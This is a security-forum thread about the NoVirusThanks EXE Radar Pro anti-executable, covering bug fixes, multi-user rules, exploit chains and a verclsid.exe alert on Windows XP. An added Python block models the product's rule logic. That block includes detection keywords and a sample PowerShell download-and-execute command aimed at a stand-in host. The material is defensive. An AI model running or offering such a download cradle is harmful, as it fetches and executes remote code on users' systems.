New Antiexecutable: NoVirusThanks EXE Radar Pro

Discussion in 'other anti-malware software' started by sg09, Jun 3, 2011.

  1. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    763
    Location:
    Italy
    @Umbra

    Sure, we will add support for changing the icon based on protection mode later.

    It will be fixed on the next build.

    @mood

    It will be fixed on the next build.

    I like this enhancement, we'll discuss it asap.

    They will be fixed on the next build.

    Thanks for reporting these issues guys :)
     
  2. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    The last time I tested NoVirusThanks EXE Radar Pro it was not multi-user friendly. In other words, the rules only applied to the current user. Is there an easy way to work around that, so the rules are applied globally (to all users)?

    Phil
     
  3. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    4,051
    Location:
    Europe then Asia
    @pcalvert they are working on it, and it is what we beta test actively right now.
     
  4. Mister X

    Mister X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    2,941
    Location:
    Mexico
    If this is the same issue, then it is not fixed at all.
     
  5. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    Great, I'm glad to "hear" that.

    What seems strange to me is that the ruleset files are located here:
    Code:
    C:\ProgramData\NoVirusThanks\EXE Radar Pro\Data\
    Since the rules only apply to the current user, I thought for sure that the data files would be located somewhere within the user's profile, like the AppData directory. I was hoping to work around the issue by copying the needed files to the SUA profile, but obviously that isn't going to work.
     
  6. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    4,051
    Location:
    Europe then Asia
    @pcalvert to use a multi-user setup with ERP v3.x.x, you have to export settings from one and import them to the other, and even then, after a reboot some of those aren't kept (especially the soft settings; rules are normally kept).
     
  7. paulderdash

    paulderdash Registered Member

    Joined:
    Dec 27, 2013
    Posts:
    2,572
    Location:
    The etherlands
  8. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    502
  9. paulderdash

    paulderdash Registered Member

    Joined:
    Dec 27, 2013
    Posts:
    2,572
    Location:
    The etherlands
    OK, you are probably right.
     
  10. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    4,051
    Location:
    Europe then Asia
    That is true in some way; anti-exe won't protect you from the exploit itself, only from what the exploit will do once it has breached the system.
    An attack is not a one-effect mechanism; it works in stages called the attack chain, so you have to block the attack somewhere in the chain, and earlier is better.
    Anti-exe and most security software will react when the dropper (if any) is executed by the poor user or when the exploit tries to execute a monitored process.
     
    Last edited: Nov 21, 2017
  11. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    763
    Location:
    Italy
    @Mister X

    That is a different issue.

    We'll add the option "Set Alert Dialog to Always on Top" to fix that.

    @paulderdash

    Simply whitelisting all exes is not good, of course; that is why we introduced "Vulnerable Processes" and now (with ERP v4.0) Parent->Child control.

    The problem is if you whitelist PowerShell.exe, then a malicious .DOC file can exploit WINWORD.exe to run PowerShell.exe to download and execute a remote payload. Or it can run JavaScript code via Cmd.exe (so no need to drop a payload on the disk). PowerShell.exe and Cmd.exe are commonly used by exploits and should not be whitelisted (instead, they should be filtered). Thanks to Vulnerable Processes + filtering of Parent->Child + filtering of command-line, you can block or be alerted about this behavior.
     
  12. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    6,531
    Location:
    U.S.A. (South)
    Superb explanation in brief. Definitely one of the more important (for me anyway) notes of interest to pen in my defense vs attack (or vice-versa) journal.

    Appreciate it much. Other duties demanding my attention lately but a huge expression of gratitude to those needling out the bugs in these preliminary releases to date. All you guys rock! Special thanks developer andreas for the new work.
     
  13. paulderdash

    paulderdash Registered Member

    Joined:
    Dec 27, 2013
    Posts:
    2,572
    Location:
    The etherlands
  14. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    4,051
    Location:
    Europe then Asia
    It should stop it.
     
  15. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    9,889
    Location:
    The Netherlands
    I have to disagree with that comment. Not all attacks involve automatic exploits, so white-listing is still a must to protect users against manually installing malware. And a lot of exploits will still eventually run file-based malware, which also should be stopped via white-listing.
     
  16. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    Why would NVT ERP be giving me alerts for verclsid.exe, which is part of Windows XP SP3? Could it be because the file isn't digitally signed?
     
  17. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    502
    Depends on your settings, and on where the file is located.
    If it is in the Windows folder, and you set ERP to auto-allow system files, then it should not alert, even if unsigned (this is assuming that it did not involve a command line containing a vulnerable process). Otherwise, it should alert.
     
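    The rule evaluation described in novirusthanks' post above (vulnerable processes, Parent->Child filtering, command-line filtering) and in shmu26's reply (auto-allow of system files, even unsigned ones), modelled as an added example; this is constructed illustration code, not NVT ERP's own code or rule syntax, and the rule lists and sample events are made up.

```python
# Constructed model of anti-executable decision logic: vulnerable-process list,
# parent->child rules, command-line filter, auto-allow of the Windows folder.
# Not NVT ERP's code; rule sets and sample events are made up for illustration.
from dataclasses import dataclass

WINDOWS_DIR = "c:\\windows\\"
# Legitimate binaries that exploits and macros commonly reuse; filtered, never whitelisted.
VULNERABLE_PROCESSES = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# Parent->child pairs with no legitimate reason to occur.
BLOCKED_PARENT_CHILD = {("winword.exe", "powershell.exe"), ("winword.exe", "cmd.exe")}
# Command-line fragments typical of download-and-execute cradles or encoded payloads.
SUSPICIOUS_CMDLINE = ("downloadstring", "-enc", "invoke-expression", "iex(")

@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process
    signed: bool        # whether the file carries a valid digital signature

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(ev, auto_allow_system=True):
    """Return (decision, reason); decision is 'allow', 'alert' or 'block'."""
    name, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.cmdline.lower()
    if name in VULNERABLE_PROCESSES:
        if (parent, name) in BLOCKED_PARENT_CHILD:
            return "block", f"parent/child rule {parent} -> {name}"
        if any(tok in cmd for tok in SUSPICIOUS_CMDLINE):
            return "block", "suspicious command line"
        return "alert", "vulnerable process, ask the user"
    # A command line that names a vulnerable process is treated as if it launched one.
    if any(vp in cmd for vp in VULNERABLE_PROCESSES):
        return "alert", "command line references a vulnerable process"
    # System files, signed or not, are quiet only while auto-allow is on.
    if ev.image.lower().startswith(WINDOWS_DIR):
        return ("allow", "system file auto-allowed") if auto_allow_system else ("alert", "system file, auto-allow disabled")
    return "alert", "unknown application"

# Constructed sample events, not captured from a real machine.
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLES = {
    "macro_cradle": ProcessEvent(PS_PATH, "powershell.exe -w hidden -Command \"IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/p'))\"", r"C:\Program Files\Microsoft Office\WINWORD.EXE", True),
    "admin_script": ProcessEvent(PS_PATH, r"powershell.exe -File C:\Scripts\backup.ps1", r"C:\Windows\explorer.exe", True),
    "verclsid": ProcessEvent(r"C:\WINDOWS\system32\verclsid.exe", "/S /C {57CE581A-0CB6-4266-9CA0-19364C90A0B3} /I {000214E8-0000-0000-C000-000000000046} /X 0x401", r"C:\WINDOWS\Explorer.EXE", False),
    "downloaded": ProcessEvent(r"C:\Users\phil\Downloads\setup.exe", "setup.exe", r"C:\WINDOWS\Explorer.EXE", True),
}
```

With auto-allow on, the unsigned verclsid.exe event is allowed and the Word-spawned PowerShell is blocked by the parent/child rule before its command line is even inspected; turning auto-allow off makes the verclsid.exe event alert instead.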
  18. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    @shmu26

    Thanks for the quick reply. When the first alert appeared I clicked on the "Block" button. After rebooting I got the alert again and again clicked on the "Block" button. There have been no alerts since then. It's a fresh (new) install of NVT ERP, and I'm guessing that had a lot to do with it.
     
  19. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    502
    Maybe you disabled the alert for it?
    Check if it is on the blocked list, and where it is located in the file system.
    If you were on ERP default settings, and this file is in the Windows folder, you should not have gotten an alert in the first place.
    I know nothing about Windows XP, so maybe someone else can give you more informed input.
     
  20. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    It happened again when I right-clicked on a file in Windows Explorer. I've attached a screenshot of the alert message.

    Here's what was in the alert pop-up:
    Code:
    Unknown Application Detected
    
    Process Name: verclsid.exe
    
    Process Path: C:\WINDOWS\system32\
    
    Command-Line: /S /C {57CE581A-0CB6-4266-9CA0-19364C90A0B3} /I {000214E8-0000-0000-C000-000000000046} /X 0x401
    
    Parent Process: C:\WINDOWS\Explorer.EXE
    
    File Publisher: Microsoft Corporation
    
    File Description: Verify Class ID
    
    Digital Signature: False
    
    I checked the MD5 and SHA-1 values for verclsid.exe and confirmed that it is part of Windows. I also checked the blacklist inside NVT ERP, and it is empty.

    [Attachment: NVT ERP alert about verclsid.exe process.png]
     
  21. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    3,100
    If it is not malicious and part of Windows, you can add the file to the whitelist. Else you'll see the prompt every time.
     
  22. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    502
    By the way, since you are using ERP, it is obvious that you are serious about PC security. So you should seriously consider moving on to a more secure version of Windows. Don't assume that ERP or other security software is enough to make up for the inherent weaknesses of XP. You are still vulnerable because the XP operating system is not built to protect from modern malware. The Windows kernel is not protected well enough.
     
  23. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    Actually, I do have Windows 8.1 Professional (retail), and I also locked in my free upgrade to Windows 10. However, I don't really like either of them. Using Windows 8.1 often makes me feel annoyed and frustrated, and I don't like feeling that way. Basically, the only reason I use it is to run tax software and other specialized software that requires a supported version of Windows.

    Since I dumped Windows 12 years ago in favor of Linux, I really only use Windows when I have no other choice. That being the case, I will only run Windows in a VM. And, unlike Windows 8.1 and Windows 10, Windows XP runs very well in a VM (on my hardware). Yes, you're right, using Windows XP is less than ideal from a security perspective, but I don't think that's reason enough to totally abandon it. A WinXP VM is useful for running old software, and the security situation can be improved considerably by heavily restricting the main "threat gates". Currently, IE and Firefox are forced to run sandboxed, and only Firefox is allowed to access the internet. But I think I will go ahead and lock down IE, Outlook Express, and WMP, etc., so they won't even be able to run if something tries to launch one of them. BTW, I think "surfing" the web on Windows XP nowadays is unwise; the main reason I have a web browser installed is because some software uses a web browser to access help files and other documentation.
     
    Last edited: Dec 8, 2017
  24. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    502
    Yeah, I also use XP in a virtual machine, for legacy software.
     